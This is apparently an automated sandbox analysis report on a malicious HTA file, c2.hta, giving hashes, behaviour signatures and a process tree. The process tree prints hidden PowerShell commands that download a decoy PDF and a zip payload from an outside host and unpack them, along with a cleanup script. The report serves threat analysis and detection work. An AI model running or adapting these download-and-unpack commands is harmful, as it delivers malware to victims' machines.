Analysis

  • max time kernel
    118s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted
    07-01-2025 21:32

General

  • Target

    c2.hta

  • Size

    5KB

  • MD5

    cbcdda2a4fece3b9fe71dc53b039762d

  • SHA1

    61113f8d33d3331152a4e627b0720c0ab261fae8

  • SHA256

    30ce460b7556cd59def93926bcd3b3e3e2ff24a66f368c9deed7efe7117d0105

  • SHA512

    1a0ef1c47f793d2ec59601626cb6ea42b2b2a086b79df39facaf1c6d65fe24241be02c8c8c5582199dce965f17fbf81d3f6f11045e3f0a9207a6033f5d255a8c

  • SSDEEP

    96:uMk0YizhV1RgcQVx+P50wMmhtbSOyOsluH3:Ovs1EMx0wFHlYU

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 7 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Runs PowerShell with the display window hidden.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempts to gather information about the system language of the victim host in order to infer its geographical location.

  • Delays execution with timeout.exe 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Modifies system certificate store 2 TTPs 7 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\c2.hta"
    1⤵
    • Blocklisted process makes network request
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Modifies system certificate store
    • Suspicious use of WriteProcessMemory
    PID:2064
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\temp.bat"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2556
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\Admin\Downloads\W2.pdf"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2612
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\Admin\AppData\Local\Temp\msword.zip"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2716
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\Admin\AppData\Local\Temp\msword.zip -DestinationPath C:\Users\Admin\AppData\Local\Temp\msword -Force"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:692
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\cleanup.bat"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2896
      • C:\Windows\SysWOW64\timeout.exe
        timeout /t 10
        3⤵
        • System Location Discovery: System Language Discovery
        • Delays execution with timeout.exe
        PID:2876

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Temp\CabED1F.tmp

    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

  • C:\Users\Admin\AppData\Local\Temp\TarED41.tmp

    Filesize

    181KB

    MD5

    4ea6026cf93ec6338144661bf1202cd1

    SHA1

    a1dec9044f750ad887935a01430bf49322fbdcb7

    SHA256

    8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

    SHA512

    6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

  • C:\Users\Admin\AppData\Local\Temp\cleanup.bat

    Filesize

    134B

    MD5

    cbc2fe81c78c659bf9960af450b9c1a5

    SHA1

    706cc41e15983638a39c0c31444a07f0a9bcfba6

    SHA256

    c728696515308f848dc27799820554f6349604111e4d4535c61d4c8aca61938a

    SHA512

    346bec9a523002149da4139e3d63e831b95af03f2386933a9e99e2ca21e7bc8fd520f59eab2638b02d24d8012d1a762585b8eda8c4b54d55f61fd0dfbbdd925a

  • C:\Users\Admin\AppData\Local\Temp\temp.bat

    Filesize

    3KB

    MD5

    87022bba9db0f800b26d9609acbbcf49

    SHA1

    d7be8cc8d4cffcce0bd7d361037bbe575e49cc6a

    SHA256

    1f6ce0f5cd3793aaea9b3f9de99f04679b8db2f1056532982d835e665006ece7

    SHA512

    b7be35a7a8ef40cf5326efd77eb4a2ee05162b241267695c6927f12340be3720af299d37afb5f02025ef8948e71c8a4f8cc21b5c805c9dd777797694c033d53f

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    0eae271729729451f34153871e4e46da

    SHA1

    1dd622bf722e28d32a7b32702e9e2de04016ff7b

    SHA256

    f5a27f41172842bd651c6920ae645187e527cffdb5b5fef91ee92474be88735c

    SHA512

    bac69bbc472f3df8fca3c2a6993d358225e2c1d6aa4ce7415382213148caab10a63e29261d7367915ec53c497d9b3e33637e178edf27036af7bdaaff33622a0e